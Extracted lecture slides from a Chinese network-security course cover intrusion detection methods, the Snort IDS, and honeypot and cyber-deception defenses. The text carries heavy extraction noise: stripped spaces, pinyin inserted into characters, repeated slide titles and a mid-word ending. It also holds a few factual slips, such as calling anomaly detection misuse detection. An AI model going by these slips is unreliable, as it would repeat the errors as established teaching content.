計(jì)算機(jī)網(wǎng)絡(luò)安全原理（第2版）課件 第13-15章 入侵檢測與網(wǎng)絡(luò)欺騙、惡意代碼、網(wǎng)絡(luò)安全新技術(shù)

第十三章入侵檢測與網(wǎng)絡(luò)欺騙入侵檢測方法2Snort簡介網(wǎng)絡(luò)欺騙入侵檢測概述1內(nèi)容提綱34Why?防火墻：根據(jù)規(guī)則對進(jìn)出網(wǎng)絡(luò)的信息進(jìn)行過濾本身問題：可能存在安全漏洞成為被攻擊的對象配置不當(dāng)：起不到作用網(wǎng)絡(luò)邊界：有缺口（如Modem，無線）不是萬能：入侵教程、工具隨處可見，攻擊模式的多樣性，并不能阻止所有攻擊內(nèi)部攻擊(Abuse)：并不是所有攻擊均來自外部誤用(Misuse)突破邊界不可避免，且難以發(fā)現(xiàn)FireEye的M-Trends2020Reports中，發(fā)現(xiàn)攻擊者隱藏或者駐留時(shí)間的中位數(shù)為56天。近幾年的威脅檢測時(shí)間都在不斷縮短，主要是由于對于內(nèi)部威脅發(fā)現(xiàn)較早，極大減少了中位數(shù)，但外部威脅的駐留時(shí)間還有141天，近5個月之久Why?1980年4月，JamesP.Anderson:《ComputerSecurityThreatMonitoringandSurveillance》:入侵檢測開山之作第一次詳細(xì)闡述了入侵檢測的概念對計(jì)算機(jī)系統(tǒng)威脅進(jìn)行分類:外部滲透、內(nèi)部滲透和不法行為提出了利用審計(jì)跟蹤數(shù)據(jù)監(jiān)視入侵活動的思想從1984年到1986年：喬治敦大學(xué)的DorothyDenning和SRI/CSL的PeterNeumann：研究出了一個實(shí)時(shí)入侵檢測系統(tǒng)模型—IDES（入侵檢測專家系統(tǒng)）1990，加州大學(xué)戴維斯分校的L.T.Heberlein等人開發(fā)出了NSM（NetworkSecurityMonitor）：第一次直接將網(wǎng)絡(luò)流作為審計(jì)數(shù)據(jù)來源：新的一頁(HIDS,NIDS)起源1987,Denning：IntrusionDetection(ID)istodetectawiderangeofsecurityviolationsfromattemptedbreak-insbyoutsiderstosystemspenetrationandabusesbyinsiders

入侵檢測定義2000,AllenIntrusionDetection(ID)istomonitorandcollectsystemandnetworkinformationandanalyzesittodetermineifanattackoranintrusionhasoccurred.入侵檢測：通過從計(jì)算機(jī)系統(tǒng)或網(wǎng)絡(luò)的關(guān)鍵點(diǎn)收集信息并進(jìn)行分析，從中發(fā)現(xiàn)系統(tǒng)或網(wǎng)絡(luò)中是否有違反安全策略的行為和被攻擊的跡象入侵檢測定義被入侵的對象：網(wǎng)絡(luò)計(jì)算機(jī)應(yīng)用（控制了計(jì)算機(jī)不一定能控制應(yīng)用）

幾個英文泀匯：Attackvs.IntrusionAttackvs.IntrudeAttackervs.Intruder(successfulattacker)Victim(thetargetofanattack)vs.CompromisedHostVulnerability入侵檢測定義

IDS:IntrusionDetectionSystem

Acombinationofhardwareandsoftwarethatmonitorsandcollectssystemandnetworkinformationandanalyzesittodetermineifanattackoranintrusionhasoccurred.SomeIDsystemscanautomaticallyrespondtoanintrusion.（入侵檢測系統(tǒng)：實(shí)施入侵檢測的軟件與硬件組合）入侵檢測定義1987,Denning：Denning入侵檢測模型IDES1998：通用入侵檢測系統(tǒng)模型（CIDF）入侵檢測模型CIDF入侵檢測分類根據(jù)檢測方法來分：基于特征的入侵檢測基于異常的入侵檢測混合的入侵檢測根據(jù)數(shù)據(jù)源來分：基于應(yīng)用的入侵檢測系統(tǒng)(Application-basedIDS,AIDS)基于主機(jī)的入侵檢測系統(tǒng)(Host-basedIDS,HIDS)基于網(wǎng)絡(luò)的入侵檢測系統(tǒng)(Network-basedIDS,NIDS)混合的入侵檢測系統(tǒng)(HybridIDS)NIDS入侵檢測分類HIDS入侵檢測分類入侵檢測方法2Snort簡介網(wǎng)絡(luò)欺騙入侵檢測概述1內(nèi)容提綱34檢測方法兩種主要的檢測方法：特征檢測（signaturedetectionormisusedetectionorsignature-baseddetectionormisuse-baseddetection）異常檢測（anomalydetectionoranomaly-baseddetection）檢測方法一、特征檢測方法一：特征檢測方法特征檢測定義：收集非正常操作的行為特征（signature），建立相關(guān)的特征庫，當(dāng)監(jiān)測的用戶或系統(tǒng)行為與庫中的記錄相匹配時(shí)，系統(tǒng)就認(rèn)為這種行為是入侵。特征：靜態(tài)特征：如

signatureanalysiswhichistheinterpretationofaseriesofpackets(orapieceofdatacontainedinthosepackets)thataredetermined,inadvance,torepresentaknownpatternofattack動態(tài)特征：如網(wǎng)絡(luò)統(tǒng)計(jì)數(shù)據(jù)、計(jì)算機(jī)或應(yīng)用系統(tǒng)中的審計(jì)記錄、日志、文件的異常變化、硬盤、內(nèi)存大小的變化特征描述：描述語言針對的是已知攻擊！檢測率取決于：攻擊特征庫的正確性與完備性1.模式匹配法將收集到的入侵特征轉(zhuǎn)換成模式，存放在模式數(shù)據(jù)庫中。檢測過程中將收集到的數(shù)據(jù)信息與模式數(shù)據(jù)庫進(jìn)行匹配，從而發(fā)現(xiàn)攻擊行為。模式匹配的具體實(shí)現(xiàn)手段多種多樣，可以是通過字符串匹配尋找特定的指令數(shù)據(jù)，也可以是采用正規(guī)的數(shù)學(xué)表達(dá)式描述數(shù)據(jù)負(fù)載內(nèi)容。技術(shù)成熟，檢測的準(zhǔn)確率和效率都很高特征檢測法實(shí)現(xiàn)方式2.專家系統(tǒng)法入侵活動被編碼成專家系統(tǒng)的規(guī)則：“If條件Then動作”的形式。入侵檢測系統(tǒng)根據(jù)收集到的數(shù)據(jù)，通過條件匹配判斷是否出現(xiàn)了入侵并采取相應(yīng)動作實(shí)現(xiàn)上較為簡單，其缺點(diǎn)主要是處理速度比較慢，原因在于專家系統(tǒng)采用的是說明性的表達(dá)方式，要求用解釋系統(tǒng)來實(shí)現(xiàn)，而解釋器比編譯器的處理速度慢。另外，維護(hù)規(guī)則庫也需要大量的人力精力，由于規(guī)則之間具有聯(lián)系性，更改任何一個規(guī)則都要考慮對其他規(guī)則的影響。特征檢測法實(shí)現(xiàn)方式3.狀態(tài)遷移法利用狀態(tài)轉(zhuǎn)換圖描述并檢測已知的入侵模式。入侵檢測系統(tǒng)保存入侵相關(guān)的狀態(tài)轉(zhuǎn)換圖表，并對系統(tǒng)的狀態(tài)信息進(jìn)行監(jiān)控，當(dāng)用戶動作驅(qū)動系統(tǒng)狀態(tài)向入侵狀態(tài)遷移時(shí)觸發(fā)入侵警告。狀態(tài)遷移法能夠檢測出多方協(xié)同的慢速攻擊，但是如果攻擊場景復(fù)雜的話，要精確描述系統(tǒng)狀態(tài)非常困難。因此，狀態(tài)遷移法通常與其他的入侵檢測法結(jié)合使用。特征檢測法實(shí)現(xiàn)方式二、異常檢測方法二：異常檢測方法異常檢測（誤用檢測）首先總結(jié)正常操作應(yīng)該具有的特征（用戶輪廓），當(dāng)用戶活動與正常行為有重大偏離時(shí)即被認(rèn)為是入侵。行為：需要一組能夠標(biāo)識用戶特征、網(wǎng)絡(luò)特征或者系統(tǒng)特征的測量參數(shù)，如CPU利用率、內(nèi)存利用率、網(wǎng)絡(luò)流量等等?；谶@組測量參數(shù)建立被監(jiān)控對象的行為模式并檢測對象的行為變化。兩個關(guān)鍵問題：選擇的測量參數(shù)能否反映被監(jiān)控對象的行為模式如何界定正常和異常如何定義正常行為？正常行為的學(xué)習(xí)依賴于學(xué)習(xí)數(shù)據(jù)的質(zhì)量，但如何評估數(shù)據(jù)的質(zhì)量呢？可以利用信息論的熵、條件熵、相對熵和信息增益等概念來定量地描述一個數(shù)據(jù)集的特征，分析數(shù)據(jù)源的質(zhì)量。數(shù)據(jù)源評價(jià)定義14-1.給定數(shù)據(jù)集合X,對任意x

∈Cx,定義熵H(X)為：在數(shù)據(jù)集中，每個唯一的記錄代表一個類，熵越小，數(shù)據(jù)也就越規(guī)則，根據(jù)這樣的數(shù)據(jù)集合建立的模型的準(zhǔn)確性越好。數(shù)據(jù)源評價(jià)定義14-2.定義條件熵H(X|Y)為：其中，P(x,y)為x和y的聯(lián)合概率，P(x|y)為給定y時(shí)x的條件概率。安全審計(jì)數(shù)據(jù)通常都具有時(shí)間上的序列特征，條件熵可以用來衡量這種特征，按照上面的定義，令X=(e1,e2,…,en)，令Y=(e1,e2,…,ek)，其中k<n，條件熵H(X|Y)可以衡量在給定Y以后，剩下的X的不確定性還有多少。條件熵越小，表示不確定性越小，從而通過已知預(yù)測未知的可靠性越大。數(shù)據(jù)源評價(jià)案例：系統(tǒng)調(diào)用系列與LSM監(jiān)控點(diǎn)系列數(shù)據(jù)源評價(jià)案例：系統(tǒng)調(diào)用系列與LSM監(jiān)控點(diǎn)系列數(shù)據(jù)源評價(jià)以統(tǒng)計(jì)理論為基礎(chǔ)建立用戶或者系統(tǒng)的正常行為模式。主體的行為模式常常由測量參數(shù)的頻度、概率分布、均值、方差等統(tǒng)計(jì)量來描述。抽樣周期可以短到幾秒鐘長至幾個月。異常：將用戶的短期特征輪廓與長期特征輪廓進(jìn)行比較，如果偏差超過設(shè)定的閾值，則認(rèn)為用戶的近期活動存在異常。入侵判定思路較為簡單，但是在具體實(shí)現(xiàn)時(shí)誤報(bào)率和漏報(bào)率都較高，此外，對于存在時(shí)間順序的復(fù)雜攻擊活動，統(tǒng)計(jì)分析法難以準(zhǔn)確描述

1、統(tǒng)計(jì)分析法常用統(tǒng)計(jì)模型操作模型，對某個時(shí)間段內(nèi)事件的發(fā)生次數(shù)設(shè)置一個閾值，如果事件變量X出現(xiàn)的次數(shù)超過閾值，就有可能是異常；平均值和標(biāo)準(zhǔn)差模型巴爾科夫過程模型

1、統(tǒng)計(jì)分析法統(tǒng)計(jì)分析法要解決四個問題選取有效的統(tǒng)計(jì)數(shù)據(jù)測量點(diǎn)，生成能夠反映主機(jī)特征的會話向量。根據(jù)主體活動產(chǎn)生的審計(jì)記錄，不斷更新當(dāng)前主體活動的會話向量。采用統(tǒng)計(jì)方法分析數(shù)據(jù)，判斷當(dāng)前活動是否符合主體的歷史行為特征。隨著時(shí)間變化，學(xué)習(xí)主體的行為特征，更新歷史記錄。

1、統(tǒng)計(jì)分析法將非法程序及非法應(yīng)用與合法程序、合法數(shù)據(jù)區(qū)分開來，與人工免疫系統(tǒng)對自體和非自體進(jìn)行類別劃分相類似。Forrest采用監(jiān)控系統(tǒng)進(jìn)程的方法實(shí)現(xiàn)了Unix平臺的人工免疫入侵檢測系統(tǒng)。2、人工免疫機(jī)器學(xué)習(xí)異常檢測方法通過機(jī)器學(xué)習(xí)模型或算法對離散數(shù)據(jù)序列進(jìn)行學(xué)習(xí)來獲得個體、系統(tǒng)和網(wǎng)絡(luò)的行為特征，從而實(shí)現(xiàn)攻擊行為的檢測3、機(jī)器學(xué)習(xí)法3、機(jī)器學(xué)習(xí)法什么是異常?在大多數(shù)異常檢測場景里，異常指與大部分其他對象不同的對象異常（離群點(diǎn)）可以分類三類：全局離群點(diǎn)：指一個數(shù)據(jù)對象顯著偏離數(shù)據(jù)集中的其余對象情境離群點(diǎn)：對于某個特定情境，這個對象顯著偏離其他對象集體離群點(diǎn)：數(shù)據(jù)對象的一個子集作為整體顯著偏離整個數(shù)據(jù)集基于機(jī)器學(xué)習(xí)的異常檢測

基于機(jī)器學(xué)習(xí)的異常檢測有標(biāo)簽數(shù)據(jù)：標(biāo)簽主要是異常和正常，其中正常的數(shù)量遠(yuǎn)大于異常。在使用有監(jiān)督算法做異常檢測的時(shí)候，有兩點(diǎn)需要特別注意：選擇合理的分類技術(shù)來處理不平衡數(shù)據(jù)。誤報(bào)率和召回率之間做合理權(quán)衡。在入侵檢測的領(lǐng)域，通常相比召回率，更需要降誤報(bào)率一些。不然根本處理不完這么多異常。有監(jiān)督異常檢測有監(jiān)督學(xué)習(xí)異常檢測存在的問題：惡意行為如果與以前所見的嚴(yán)重背離，將無法被歸類，因此將無法被檢測到需要大量人工對訓(xùn)練數(shù)據(jù)進(jìn)行標(biāo)注任何錯誤標(biāo)記的數(shù)據(jù)或人為引入的偏見都會嚴(yán)重影響系統(tǒng)對新活動進(jìn)行正確分類的能力有監(jiān)督異常檢測無標(biāo)簽數(shù)據(jù)應(yīng)用這種算法的時(shí)候，其實(shí)是做了這樣一個假設(shè)：正常對象遵守遠(yuǎn)比離群點(diǎn)頻繁的模式，正常對象不必全部落入一個具有高度相似性的簇，而是可以形成多個簇，每個簇具有不同的特征。然而，離群點(diǎn)必須是遠(yuǎn)離正常對象的簇。這類算法的目標(biāo)是將一個得分打在每個樣本上，反映該樣本異常的程度。無監(jiān)督異常檢測無監(jiān)督異常檢測算法算法很多，如基于密度的異常檢測、基于鄰近度的異常檢測、基于模型的異常檢測、基于概率統(tǒng)計(jì)的異常檢測、基于聚類的異常檢測、OneClassSVM的異常檢測、iForest的異常檢測、PCA異常檢測、AutoEncoder異常檢測、序列數(shù)據(jù)的異常檢測等，可分為五大類：統(tǒng)計(jì)和概率模型、線性模型、基于相似度衡量的模型、集成異常檢測和模型融合、特定領(lǐng)域的異常檢測無監(jiān)督異常檢測訓(xùn)練集包含少量帶標(biāo)簽的樣本。使用有標(biāo)記的正常對象的信息，對于給定的對象集合，發(fā)現(xiàn)異常樣本或得分帶標(biāo)簽樣本是正常樣本：使用這些正常樣本與鄰近的無標(biāo)簽對象一起訓(xùn)練一個正常對象的模型，然后用這個模型來檢測離群點(diǎn)。（白名單）帶標(biāo)簽樣本是異常樣本：這種情況比較棘手，因?yàn)樯倭侩x群點(diǎn)不代表所有離群點(diǎn)，因此僅基于少量離群點(diǎn)而構(gòu)建的離群點(diǎn)模型不太有效。弱監(jiān)督異常檢測異常檢測方法基于模型的異常檢測基于距離（鄰近度）的異常檢測基于密度的異常檢測基于聚類的異常檢測基于機(jī)器學(xué)習(xí)的異常檢測基于機(jī)器學(xué)習(xí)的異常檢測根據(jù)模型本身的特點(diǎn)進(jìn)行分類，大致可以分為以下幾種：統(tǒng)計(jì)檢驗(yàn)方法基于深度的方法基于偏差的方法基于距離的方法基于密度的方法深度學(xué)習(xí)方法基于機(jī)器學(xué)習(xí)的異常檢測使用這類方法基于的基本假設(shè)是：正常的數(shù)據(jù)是遵循特定分布形式的，并且占了很大比例，而異常點(diǎn)的位置和正常點(diǎn)相比存在比較大的偏移統(tǒng)計(jì)檢驗(yàn)方法從點(diǎn)空間的邊緣定位異常點(diǎn)，按照不同程度的需求，決定層數(shù)及異常點(diǎn)的個數(shù)基于深度的方法從點(diǎn)空間的邊緣定位異常點(diǎn)，按照不同程度的需求，決定層數(shù)及異常點(diǎn)的個數(shù)基于深度的方法IsolationForest這是一種比較簡單的統(tǒng)計(jì)方法，最初是為單維異常檢測設(shè)計(jì)的。給定一個數(shù)據(jù)集后，對每個點(diǎn)進(jìn)行檢測，如果一個點(diǎn)自身的值與整個集合的指標(biāo)存在過大的偏差，則該點(diǎn)為異常點(diǎn)基于偏差的方法計(jì)算每個點(diǎn)與周圍點(diǎn)的距離，來判斷一個點(diǎn)是不是存在異常。基于的假設(shè)是正常點(diǎn)的周圍存在很多個近鄰點(diǎn)，而異常點(diǎn)距離周圍點(diǎn)的距離都比較遠(yuǎn)：DB、kNN、k-Means等基于距離的方法DB模型kNN針對所研究的點(diǎn)，計(jì)算它的周圍密度和其臨近點(diǎn)的周圍密度，基于這兩個密度值計(jì)算出相對密度，作為異常分?jǐn)?shù)。即相對密度越大，異常程度越高?；诘募僭O(shè)是，正常點(diǎn)與其近鄰點(diǎn)的密度是相近的，而異常點(diǎn)的密度和周圍的點(diǎn)存在較大差異。局部異常因子算法（LOF）、KNN基于密度的方法目前最常用于異常檢測的深度學(xué)習(xí)方法是Autoencoder深度學(xué)習(xí)方法目前最常用于異常檢測的深度學(xué)習(xí)方法是Autoencoder深度學(xué)習(xí)方法目前最常用于異常檢測的深度學(xué)習(xí)方法是Autoencoder深度學(xué)習(xí)方法目前最常用于異常檢測的深度學(xué)習(xí)方法是Autoencoder深度學(xué)習(xí)方法在實(shí)際應(yīng)用中，如何選擇哪種機(jī)器學(xué)習(xí)算法進(jìn)行異常檢測呢？當(dāng)已標(biāo)記數(shù)據(jù)量充足的情況下，優(yōu)先選用有監(jiān)督學(xué)習(xí)，效果一般不錯；當(dāng)只有少數(shù)攻擊樣本的情況下，可考慮用半監(jiān)督學(xué)習(xí)進(jìn)行異常檢測；當(dāng)遇到一個新的安全場景，沒有樣本數(shù)據(jù)或是以往積累的樣本失效的情況下，先用無監(jiān)督學(xué)習(xí)來解決異常檢測問題，當(dāng)捕獲到異常并人工審核積累樣本到一定量后，可以轉(zhuǎn)化為半監(jiān)督學(xué)習(xí)，之后就是有監(jiān)督學(xué)習(xí)

機(jī)器學(xué)習(xí)算法的選擇異常檢測方法小結(jié)異常檢測（誤用檢測）可以檢測未知攻擊！?不在預(yù)定義的合法行為集中，就一定是攻擊嗎？檢測率取決于：正常行為模式的正確性與完備性以及監(jiān)控的頻率系統(tǒng)能針對用戶行為的改變進(jìn)行自我調(diào)整和優(yōu)化，但隨著檢測模型的逐步精確，檢測過程會消耗更多的系統(tǒng)資源兩種方法比較檢測的攻擊類型：已知與未知特征：已知攻擊特征與已知正常行為特征性能：誤報(bào)率(rateoffalsepositive)與漏報(bào)率(rateoffalsenegative)對每種方法，各在何種情況下發(fā)生誤報(bào)、漏報(bào)？三、入侵檢測評價(jià)指標(biāo)評價(jià)指標(biāo)四、入侵檢測標(biāo)準(zhǔn)化IETF的Internet草案工作組（IntrusionDetectionWorkingGroup，IDWG）專門負(fù)責(zé)定義入侵檢測系統(tǒng)組件之間，及不同廠商的入侵檢測系統(tǒng)之間的通信格式。但目前只有相關(guān)的草案（Draft），還未形成正式的RFC文檔。入侵警報(bào)協(xié)議（IntrusionAlarmProtocol,IAP）入侵檢測交換協(xié)議(IntrusionDetectionExchangeProtocol,IDXP)標(biāo)準(zhǔn)化IETF的Internet草案工作組（IntrusionDetectionWorkingGroup，IDWG）專門負(fù)責(zé)定義入侵檢測系統(tǒng)組件之間，及不同廠商的入侵檢測系統(tǒng)之間的通信格式。但目前只有相關(guān)的草案（Draft），還未形成正式的RFC文檔。入侵警報(bào)協(xié)議（IntrusionAlarmProtocol,IAP）入侵檢測交換協(xié)議(IntrusionDetectionExchangeProtocol,IDXP)標(biāo)準(zhǔn)化DARPA和加州大學(xué)Davis分校的安全實(shí)驗(yàn)室在1998年提出了公共入侵檢測框架（CommonIntrusionDetectionFramework，CIDF）標(biāo)準(zhǔn)標(biāo)準(zhǔn)化國標(biāo)標(biāo)準(zhǔn)化標(biāo)準(zhǔn)化的困境標(biāo)準(zhǔn)化入侵檢測方法2Snort簡介網(wǎng)絡(luò)欺騙入侵檢測概述1內(nèi)容提綱34/入侵檢測系統(tǒng)SnortSnort是采用C語言編寫的一款開源基于網(wǎng)絡(luò)的入侵檢測系統(tǒng)，具有小巧靈活、配置簡便、功能強(qiáng)大、檢測效率高等特點(diǎn)。Snort主要采用特征檢測的工作方式，通過預(yù)先設(shè)置的檢測規(guī)則對網(wǎng)絡(luò)數(shù)據(jù)包進(jìn)行匹配，發(fā)現(xiàn)各種類型的網(wǎng)絡(luò)攻擊SnortSnort由三個模塊組成：由數(shù)據(jù)包解析器、檢測引擎、日志與報(bào)警子系統(tǒng)網(wǎng)絡(luò)數(shù)據(jù)包首先交給數(shù)據(jù)包解析器進(jìn)行解析處理，處理結(jié)果提交給檢測引擎與用戶設(shè)定的檢測規(guī)則進(jìn)行匹配。在此基礎(chǔ)上，檢測引擎的輸出交給日志與報(bào)警子系統(tǒng)處理，日志與報(bào)警子系統(tǒng)將依據(jù)系統(tǒng)設(shè)置，記錄數(shù)據(jù)包信息或者發(fā)出警報(bào)。SnortSnort規(guī)則Snort/SnortSnort典型部署圖BLINDINGSNORT:BREAKINGTHEMODBUSOTPREPROCESSOR

(ByUriKatz|April14,2022)參考：Snort安全漏洞入侵檢測方法2Snort簡介網(wǎng)絡(luò)欺騙入侵檢測概述1內(nèi)容提綱34網(wǎng)絡(luò)欺騙網(wǎng)絡(luò)欺騙（CyberDeception）最早由美國普渡大學(xué)的GeneSpafford于1989年提出，它的核心思想是：采用引誘或欺騙戰(zhàn)略，誘使入侵者相信網(wǎng)絡(luò)與信息系統(tǒng)中存在有價(jià)值的、可利用的安全弱點(diǎn)，并具有一些可攻擊竊取的資源（當(dāng)然這些資源是偽造的或不重要的），進(jìn)而將入侵者引向這些錯誤的資源，同時(shí)安全可靠地記錄入侵者的所有行為，以便全面地了解攻擊者的攻擊過程和使用的攻擊技術(shù)。網(wǎng)絡(luò)欺騙網(wǎng)絡(luò)欺騙用途吸引攻擊流量，影響入侵者使之按照防護(hù)方的意志進(jìn)行行動檢測入侵者的攻擊并獲知其攻擊技術(shù)和意圖，對入侵行為進(jìn)行告警和取證，收集攻擊樣本增加入侵拖延攻擊者攻擊真實(shí)目標(biāo)者的工作量、入侵復(fù)雜度以及不確定性，為網(wǎng)絡(luò)防護(hù)提供足夠的信息來了解入侵者，這些信息可以用來強(qiáng)化現(xiàn)有的安全措施一、蜜罐（Honeypot）蜜罐（Honeypot）是最早采用欺騙技術(shù)的網(wǎng)絡(luò)安全系統(tǒng)。定義：蜜罐是一種安全資源，其價(jià)值在于被探測、攻擊或突破目標(biāo)：就是使它被掃描探測、攻擊或被突破，同時(shí)能夠很好地進(jìn)行安全控制蜜罐根據(jù)部署方式可以分為生產(chǎn)型蜜罐和研究型蜜罐蜜罐分類根據(jù)交互程度或逼真程度的高低可以分為低交互蜜罐、中交互蜜罐和高交互蜜罐蜜罐分類按照實(shí)現(xiàn)方式可將蜜罐分為物理蜜罐和虛擬蜜罐蜜罐分類低交互蜜罐的功能相對簡單，一般包括：①攻擊數(shù)據(jù)捕獲與處理，在一個或多個協(xié)議服務(wù)端口上監(jiān)聽，當(dāng)有攻擊數(shù)據(jù)到來時(shí)捕獲并處理這些攻擊數(shù)據(jù)，必要的時(shí)候還需給出響應(yīng)，將處理后的攻擊數(shù)據(jù)記錄到本地日志，同時(shí)向平臺服務(wù)端（如果有的話）實(shí)時(shí)推送；②攻擊行為分析，對攻擊日志進(jìn)行多個維度（協(xié)議維，時(shí)間維，地址維等）的統(tǒng)計(jì)分析，發(fā)現(xiàn)攻擊行為規(guī)律，并用可視化方法展示分析結(jié)果蜜罐功能與關(guān)鍵技術(shù)高交互蜜罐的功能相對復(fù)雜，一般包括：網(wǎng)絡(luò)欺騙：對蜜罐進(jìn)行偽裝，使它在被攻擊者掃描時(shí)表現(xiàn)為網(wǎng)絡(luò)上的真實(shí)主機(jī)空間欺騙技術(shù)網(wǎng)絡(luò)流量仿真網(wǎng)絡(luò)動態(tài)配置多重地址轉(zhuǎn)換創(chuàng)建組織信息欺騙蜜罐功能與關(guān)鍵技術(shù)高交互蜜罐的功能相對復(fù)雜，一般包括：攻擊捕獲：采集攻擊者對網(wǎng)絡(luò)實(shí)施攻擊的相關(guān)信息，通過分析捕獲的信息，可以研究攻擊者所利用的系統(tǒng)漏洞，獲取新的攻擊方式，甚至是零日攻擊。難點(diǎn)是要在防止被攻擊者識破的情況下盡可能多地記錄下系統(tǒng)狀態(tài)信息，還有通信加密問題蜜罐功能與關(guān)鍵技術(shù)高交互蜜罐的功能相對復(fù)雜，一般包括：數(shù)據(jù)控制：限制蜜罐向外發(fā)起的連接，確保蜜罐不會成為攻擊者的跳板數(shù)據(jù)分析：對蜜罐采集到的信息進(jìn)行多個維度（協(xié)議維，時(shí)間維，地址維，代碼維等）的統(tǒng)計(jì)分析，發(fā)現(xiàn)攻擊行為規(guī)律，并用可視化方法展示分析結(jié)果蜜罐功能與關(guān)鍵技術(shù)經(jīng)過多年的發(fā)展，有很多商用或開源的蜜罐項(xiàng)目，如honeyd,TheHoneynetProject,狩獵女神，Specter,Mantrap等。開源軟件平臺gitbub上可以找到大量各種類型的蜜罐(/paralax/awesome-honeypots/blob/master/README_CN.md給出了一個比較完整的蜜罐資源列表及網(wǎng)絡(luò)鏈接)，如數(shù)據(jù)庫類蜜罐（如HoneyMysql，MongoDB等）、Web類蜜罐（如ShadowDaemon，StrutsHoneypot,WebTrap等）、服務(wù)類蜜罐（如Honeyprint,SMBHoneypot,honeyntp,honeyprint等）、工業(yè)控制類蜜罐（如Conpot,Gaspot,SCADAHoneynet,gridpot）蜜罐相關(guān)項(xiàng)目用蜜罐檢測Kerberoasting攻擊用蜜罐檢測Kerberoasting攻擊/paralax/awesome-honeypots蜜罐資源鏈接如何發(fā)現(xiàn)蜜罐？二、蜜網(wǎng)（Honeynet）蜜網(wǎng)（Honeynet）是由多個蜜罐組成的欺騙網(wǎng)絡(luò)，蜜網(wǎng)中通常包含不同類型的蜜罐，可以在多個層面捕獲攻擊信息，以滿足不同的安全需求蜜網(wǎng)既可以用多個物理蜜罐來構(gòu)建，也可以由多個虛擬蜜罐組成。目前，通過虛擬化技術(shù)（如VMware）可以方便地把多個虛擬蜜罐部署在單個服務(wù)器主機(jī)上蜜網(wǎng)最早的蜜網(wǎng)項(xiàng)目是德國曼海姆大學(xué)LanceSpitzner在1999年開始發(fā)起，并于2000年6月成立的蜜網(wǎng)項(xiàng)目（TheHoneynetProject）目標(biāo)：“研究黑客團(tuán)體的工具、策略、動機(jī)，并且共享所獲得的知識”2001.12，該小組宣布成立“蜜網(wǎng)研究聯(lián)盟”北京大學(xué)的狩獵女神項(xiàng)目(TheArtemisProject)蜜網(wǎng)三、網(wǎng)絡(luò)欺騙防御有關(guān)“網(wǎng)絡(luò)欺騙防御”這一名詞的內(nèi)涵和外延目前還沒有一個統(tǒng)一的、權(quán)威的定義本書的觀點(diǎn)：網(wǎng)絡(luò)欺騙防御是一種體系化的防御方法，它將蜜罐、蜜網(wǎng)、混淆等欺騙技術(shù)同防火墻、入侵檢測系統(tǒng)等傳統(tǒng)防護(hù)機(jī)制有機(jī)結(jié)合起來，構(gòu)建以欺騙為核心的網(wǎng)絡(luò)安全防御體系網(wǎng)絡(luò)欺騙防御Garter對網(wǎng)絡(luò)欺騙防御（CyberDeceptionDefense）的定義為：使用騙局或者假動作來阻撓或者推翻攻擊者的認(rèn)知過程，擾亂攻擊者的自動化工具，延遲或阻斷攻擊者的活動，通過使用虛假的響應(yīng)、有意的混淆、假動作、誤導(dǎo)等偽造信息達(dá)到“欺騙”的目的網(wǎng)絡(luò)欺騙防御根據(jù)網(wǎng)絡(luò)空間欺騙防御的作用位置不同，可以將其分為不同的層次，包括：網(wǎng)絡(luò)層欺騙終端層欺騙應(yīng)用層欺騙數(shù)據(jù)層欺騙網(wǎng)絡(luò)欺騙防御技術(shù)國內(nèi)外已有一些網(wǎng)絡(luò)欺騙防御產(chǎn)品：TrapXSecurity的DeceptionGridDARPA的Prattle美國Sandia國家實(shí)驗(yàn)室的Hades長亭科技2016年推出基于欺騙偽裝技術(shù)的內(nèi)網(wǎng)威脅感知系統(tǒng)諦聽（D-Sensor）幻陣是我國默安科技研發(fā)的一款基于攻擊混淆與欺騙防御技術(shù)的威脅檢測防御系統(tǒng)網(wǎng)絡(luò)欺騙防御系統(tǒng)把黑客變成免費(fèi)滲透測試服務(wù)人員德克薩斯大學(xué)達(dá)拉斯分校的研究人員應(yīng)用機(jī)器學(xué)習(xí)開發(fā)更有效的蜜罐式網(wǎng)絡(luò)防御——智能DeepDigDeepDig本章小結(jié)IDS的應(yīng)用困境（誤報(bào)與漏報(bào)）與未來（不再作為一個獨(dú)立的安全防護(hù)產(chǎn)品？）沒有防火墻（邊界不設(shè)防）和IDS能實(shí)現(xiàn)網(wǎng)絡(luò)安全目標(biāo)嗎？討論作業(yè)參考內(nèi)容一、IPS

IPS:

IntrusionPreventionSystem入侵檢測＋主動防御主動防御：預(yù)先對入侵活動和攻擊性網(wǎng)絡(luò)流量進(jìn)行攔截，避免其造成任何損失，而不是簡單地在惡意流量傳送時(shí)或傳送后才發(fā)出警報(bào)發(fā)現(xiàn)攻擊作出響應(yīng)存在問題：由于增加了主動阻斷能力，檢測準(zhǔn)確程度的高低對于IPS來說十分關(guān)鍵存在問題：多種技術(shù)融合誤報(bào)導(dǎo)致合法數(shù)據(jù)被阻塞相關(guān)概念：入侵防御系統(tǒng)(IPS)IDS與IPSIDS與IPSIDS與IPSIDS與IPSIDS幫助網(wǎng)絡(luò)系統(tǒng)快速發(fā)現(xiàn)網(wǎng)絡(luò)攻擊IPS綜合了防火墻、IDS、漏洞掃描與評估等安全技術(shù)，可以主動地、積極地防范、阻止系統(tǒng)入侵IMS（IntrusionManagementSystem，入侵管理系統(tǒng)）包含了IDS、IPS的功能，并通過一個統(tǒng)一的平臺進(jìn)行統(tǒng)一管理IDS、IPS與IMS二、機(jī)器學(xué)習(xí)算法人工智能與機(jī)器學(xué)習(xí)機(jī)器學(xué)習(xí)機(jī)器學(xué)習(xí)根據(jù)先驗(yàn)信息的不同，機(jī)器學(xué)習(xí)可分為:監(jiān)督學(xué)習(xí)無監(jiān)督學(xué)習(xí)半監(jiān)督學(xué)習(xí)強(qiáng)化學(xué)習(xí)機(jī)器學(xué)習(xí)監(jiān)督學(xué)習(xí)(SupervisedLearning)：通過標(biāo)注值告訴模型在給定輸入的情況下應(yīng)該輸出什么值，由此獲得盡可能接近真實(shí)映射方式的優(yōu)化模型監(jiān)督學(xué)習(xí)模型Mp示例輸入x標(biāo)記預(yù)測輸出機(jī)器學(xué)習(xí)無監(jiān)督學(xué)習(xí)(UnsupervisedLearning)：通過比對樣本之間的某種聯(lián)系實(shí)現(xiàn)對樣本的數(shù)據(jù)分析機(jī)器學(xué)習(xí)半監(jiān)督學(xué)習(xí)(SemisupervisedLearning)：訓(xùn)練集包含少量帶標(biāo)簽的樣本，更多是沒有標(biāo)簽的數(shù)據(jù)。半監(jiān)督的目標(biāo)是使用有標(biāo)記的正常對象的信息，對于給定的對象集合，發(fā)現(xiàn)異常樣本或得分機(jī)器學(xué)習(xí)強(qián